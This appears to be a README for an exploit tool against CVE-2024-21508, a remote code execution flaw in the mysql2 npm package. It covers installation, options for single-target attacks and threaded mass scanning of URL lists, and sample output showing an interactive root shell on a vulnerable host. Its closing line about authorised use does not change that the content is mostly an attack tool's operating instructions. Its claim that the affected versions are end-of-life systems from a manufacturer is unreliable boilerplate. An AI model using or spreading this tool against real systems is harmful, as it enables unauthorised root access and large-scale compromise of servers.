mysql2 is a mostly API compatible with mysqljs and supports majority of features.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via the readCodeFor function due to improper validation of the supportBigNumbers and bigNumberStrings values.
To set up the exploitation tool, follow these steps:
- Download the repository:
| Download |
|---|
- Navigate to the tool's directory:
cd CVE-2024-21508- Install the required Python packages:
pip install -r requirements.txtTo use the tool, run the script from the command line as follows:
python exploit.py [options]-
-u, --url: Specify the target URL or IP address.
-
-f, --file: Specify a file containing a list of URLs to scan.
-
-t, --threads: Set the number of threads for concurrent scanning.
-
-o, --output: Define an output file to save the scan results.
When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to open an interactive shell.
$ python3 exploit.py -u http://127.0.0.1
[+] Command executed successfully.
[!] http://127.0.0.1 is vulnerable to CVE-2024-21508: uid=0(root) gid=0(root)
[+] Opening interactive shell...
$ id
[+] Command executed successfully.
uid=0(root) gid=0(root)For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.
python exploit.py -f urls.txtThe vulnerability affects the following versions of MySQL2:
- mysql2 to version 3.9.4 or LOWER.
These systems are considered to be end-of-life (EOL), meaning they are no longer supported or receiving updates from the manufacturer. It is strongly recommended that these systems are no longer used.
Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.
Special thanks to the researcher @netsecfish for their work in identifying this vulnerability.